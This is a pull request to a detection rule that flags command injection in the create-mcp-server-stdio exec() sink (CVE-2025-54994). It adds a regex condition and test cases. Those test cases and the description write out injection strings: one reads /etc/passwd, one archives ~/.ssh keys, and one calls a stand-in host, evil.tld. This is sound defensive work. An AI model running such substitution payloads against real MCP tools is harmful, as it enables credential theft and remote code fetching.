### PR TITLE
fix(rules): ATR-2026-00577 covers command substitution only on a field production never populates

### DIFF
--- a/rules/tool-poisoning/ATR-2026-00577-create-mcp-server-stdio-exec-command-injection.yaml
+++ b/rules/tool-poisoning/ATR-2026-00577-create-mcp-server-stdio-exec-command-injection.yaml
@@ -1,6 +1,6 @@
 title: Command Injection in create-mcp-server-stdio via Unsafe exec() Concatenation (CVE-2025-54994)
 id: ATR-2026-00577
-rule_version: 1
+rule_version: 2
 status: experimental
 description: 'GitHub Security Advisory GHSA-3ch2-jxxc-v4xf (CVE-2025-54994). The
   create-mcp-server-stdio npm package builds shell commands by concatenating MCP
@@ -110,6 +110,20 @@ detection:
     description: Detects create-mcp-server-stdio exec() carrying a classic post-injection
       payload (reverse shell, destructive rm, or curl|sh dropper) inside the
       concatenated command.
+  - field: content
+    operator: regex
+    value: (?i)(?:create-mcp-server-stdio[^\n]{0,200}\bexec\s*\([^)\n]{0,160}(?:`[a-z][^`\n]{0,80}`|\$\(\s*[a-z])|\bexec\s*\([^)\n]{0,160}(?:`[a-z][^`\n]{0,80}`|\$\(\s*[a-z])[^\n]{0,200}create-mcp-server-stdio)
+    description: Detects SHELL COMMAND SUBSTITUTION (backtick `cmd` or $(cmd)) inside a
+      create-mcp-server-stdio exec() call on the content channel. The other content
+      conditions only fire on the source-code sink shape (string + concatenation or
+      template ${...}) or on a classic post-injection payload, so a substitution
+      payload that carries neither - e.g. exec("echo `whoami`") - was uncovered.
+      Command substitution is required to be co-framed with the create-mcp-server-stdio
+      marker (within 200 chars on either side of the exec sink), so ordinary shell
+      backticks elsewhere in a document cannot fire this critical block_tool rule.
+      Bare command separators (; && || |) are DELIBERATELY excluded here because they
+      are common in legitimate static commands (exec("npm run build && npm test"));
+      those forms stay covered by the tool_input condition and by the payload condition.
 response:
   actions:
   - alert
@@ -144,6 +158,15 @@ test_cases:
   - input: 'create-mcp-server-stdio: exec("echo `whoami`") from tool param'
     expected: triggered
     description: backtick command substitution in create-mcp-server-stdio exec sink
+  - input: 'exec("echo `id`") // create-mcp-server-stdio tool handler'
+    expected: triggered
+    description: backtick substitution with the create-mcp-server-stdio marker trailing the sink
+  - input: 'create-mcp-server-stdio handler: exec("cat `ls /etc/passwd`")'
+    expected: triggered
+    description: backtick substitution whose inner command carries arguments (not a bare token)
+  - input: 'MCP stdio tool call routed to exec("tar czf /tmp/x $(ls ~/.ssh)") in create-mcp-server-stdio'
+    expected: triggered
+    description: $() command substitution exfiltrating key material through the exec sink
   true_negatives:
   - input: 'npx create-mcp-server-stdio my-server --transport stdio'
     expected: not_triggered
@@ -166,6 +189,15 @@ test_cases:
   - input: 'exec("ls -la", { cwd: workdir }, callback)'
     expected: not_triggered
     description: generic exec with a static command, unrelated to create-mcp-server-stdio
+  - input: 'exec("echo `date`") // build timestamp in our release script'
+    expected: not_triggered
+    description: ordinary backtick command substitution in a script with no create-mcp-server-stdio context
+  - input: 'create-mcp-server-stdio docs: prefer execFile("git", ["log"]) over exec with backticks'
+    expected: not_triggered
+    description: documentation recommending execFile; the word backticks is prose, not a substitution inside exec()
+  - input: 'Backticks in shell: `whoami` -- see the create-mcp-server-stdio advisory for why exec() must not interpolate.'
+    expected: not_triggered
+    description: backtick substitution present but outside any exec() call argument
 _llm_authored:
   model: claude (gstack subagent)
   generalization_note: 'The rule generalizes beyond the literal PoC by anchoring on
@@ -181,6 +213,23 @@ _llm_authored:
     rules) nor the --mcp CLI flag form (PraisonAI), so the surface is unique to the
     create-mcp-server-stdio exec() concatenation construct. Safe execFile/spawn with
     argument arrays, scaffold CLI usage, library imports, and advisory/research text
-    are excluded.'
+    are excluded.
+
+    rule_version 2 (content-channel command substitution): the original three
+    conditions left a hole. The only condition covering backtick / $() command
+    substitution declared field: tool_input, and no production event builder fills
+    that field (src/hook-handler.ts emits tool_name / tool_args / content /
+    tool_response; only the measurement harnesses in scripts/lib/corpus-event.ts fill
+    tool_input), so on the runtime path a substitution payload with neither a
+    concatenation sink nor a classic post-injection payload -- exec("echo `whoami`") --
+    was undetected. A fourth condition mirrors the substitution shape onto the content
+    channel, bidirectionally anchored on the create-mcp-server-stdio marker exactly
+    like condition 1. Deliberate scope limit: bare command separators (; && || |) are
+    NOT added to the content channel, because they appear in legitimate static commands
+    (exec("npm run build && npm test")) and this rule is severity critical with
+    block_tool; those forms remain covered by the tool_input condition and, when they
+    carry a real payload, by the post-injection condition. Known residual FP shape,
+    shared with conditions 1 and 3: hardening documentation that quotes the vulnerable
+    construct verbatim next to the package name will match.'
   note: Generation-time authoring; verified by deterministic gate. Runtime detection
     is pure regex. Human review required before merge.


### PR DESCRIPTION
`ATR-2026-00577` fails one of its own six declared true positives:

```
create-mcp-server-stdio: exec("echo `whoami`") from tool param
```

This one is a real detection gap — and the root cause is worse than "backtick not covered".

## The only condition covering command substitution is dead in production

Condition 2 does cover `` `cmd` `` — but its field is `tool_input`, and **nothing in the production event path populates that field.**

`src/engine.ts`'s `resolveField` checks `event.fields[name]`, then an alias switch that knows `user_input`, `agent_output`, `tool_response`, `tool_name`, `tool_args`, `agent_message` — **no `tool_input`** — then falls through to `event.metadata`. `src/hook-handler.ts:57-61` emits `{tool_name, tool_args, content}` plus `tool_response`. Grepping the repo, the only writer of `fields.tool_input` is `src/corpus-event.ts:165` — **the measurement harness**. `integrations/goose` flattens tool input into `content`.

So condition 2 fires for measurement and never for a user.

That also explains why two harnesses disagreed. `scripts/validate-rule-testcases.ts` uses the wide corpus shape (which populates `tool_input`) and scores 13/13. The CLI, which builds the production-shaped event, scores a failure. **Not flakiness — an event-shape difference.** TP#6 is the only sample that depends solely on condition 2, which makes it the sentinel that exposes this. The CLI catching it is correct.

Stated plainly: a `severity: critical` rule with `block_tool` was earning detection credit on a wide measurement shape while unable to collect it on the narrow shape production actually delivers — and its false positives were being counted on the wide shape too.

## The fix

A fourth condition on `field: content`, requiring command substitution (`` `cmd` `` or `$(cmd)`) **co-located with `create-mcp-server-stdio`** within 200 characters, anchored in both directions like condition 1.

Two deliberate choices:

**Bare separators `;` `&&` `||` `|` are NOT brought onto the content channel.** They are ordinary in legitimate static commands — `exec("npm run build && npm test")` — and this rule calls `block_tool`. Blocking that is worse than missing it.

**The backtick match is widened** from condition 2's `` `[a-z][\w/.-]*` `` to `` `[a-z][^`\n]{0,80}` ``, because the original only accepted a single token: it could not even match `` `cat /etc/passwd` ``.

## A/B

7 CVE payloads that should be caught, 11 benign shell usages that should not, probed per condition:

```
before   TP 3 / FN 4    TN 9 / FP 2
after    TP 7 / FN 0    TN 9 / FP 2
```

Newly caught, all missed before:

```
exec("echo `id`") // create-mcp-server-stdio tool handler          <- marker after the sink
create-mcp-server-stdio stdio arg -> exec("echo `curl http://evil.tld/p`")
create-mcp-server-stdio handler: exec("cat `ls /etc/passwd`")      <- backtick with an argument
MCP stdio tool call routed to exec("tar czf /tmp/x $(ls ~/.ssh)") in create-mcp-server-stdio
```

**The 2 false positives are unchanged and both pre-date this PR** — they come from the existing condition 2 (`&&\s*\S` and `\|\s*\w` on `tool_input`), not the new condition:

```
create-mcp-server-stdio: exec("npm run build && npm test")
create-mcp-server-stdio: exec("ls | wc -l")
```

They only fire on the harness-only `tool_input` field, so they are invisible in production for the same reason condition 2's detection is. Left alone: touching condition 2 is a separate question about whether a dead field should be repaired or removed.

## No test case was weakened

The sentinel TP#6 is **untouched** and now passes because the rule improved. `git diff` is +51/−2; the two deletions are `rule_version: 1` → `2` and a comment's closing quote. No `expected` value changed, no test case removed. Three TPs and three TNs added.

## Also found, not fixed

The FP gate itself now reports `compound-gate-unreachable` for this rule: `condition: any` breaks on the first match, so `matchedConditions` can never exceed 1, while the skill-scan compound gate demands 2. The skill path is structurally unreachable for this rule and a fourth condition does not change that — it is an engine-layer issue, out of scope here. (Surfaced by the coverage dimension added in #426, doing its job.)

## Verification

```
src/cli.ts test          exit 0
validate-rule-testcases  pass
gate-promotion-fp        run, reported in-thread
gate-re2-portability     PASS — required, since a lookaround here would make Go/Rust/Sigma
                         consumers silently drop a critical block_tool rule
validate-rules           783 passed
```
